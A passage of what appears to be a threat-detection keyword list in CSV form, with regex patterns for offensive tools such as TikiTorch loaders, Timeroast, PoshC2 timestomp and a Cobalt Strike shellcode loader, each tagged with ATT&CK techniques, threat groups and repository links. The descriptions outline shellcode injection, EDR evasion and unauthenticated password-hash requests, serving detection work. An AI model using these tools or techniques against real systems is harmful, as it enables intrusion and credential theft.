T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*TikiLoader.Injector*",".{0,1000}TikiLoader\.Injector.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader\TikiLoader*",".{0,1000}TikiLoader\\TikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawn.dll*",".{0,1000}TikiSpawn\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawn.exe*",".{0,1000}TikiSpawn\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawn.ps1*",".{0,1000}TikiSpawn\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnAs*",".{0,1000}TikiSpawnAs.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnAsAdmin*",".{0,1000}TikiSpawnAsAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnElevated*",".{0,1000}TikiSpawnElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnWOppid*",".{0,1000}TikiSpawnWOppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnWppid*",".{0,1000}TikiSpawnWppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiTorch.exe*",".{0,1000}TikiTorch\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiVader.*",".{0,1000}TikiVader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*timemachine_cmd_injection*",".{0,1000}timemachine_cmd_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*timeroast.ps1*",".{0,1000}timeroast\.ps1.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*timeroast.py*",".{0,1000}timeroast\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*timestomp c:*",".{0,1000}timestomp\sc\:.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*timestomp.x64.o*",".{0,1000}timestomp\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*timing_attack * --brute-force*",".{0,1000}timing_attack\s.{0,1000}\s\-\-brute\-force.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*timwhitez/Doge-Loader*",".{0,1000}timwhitez\/Doge\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 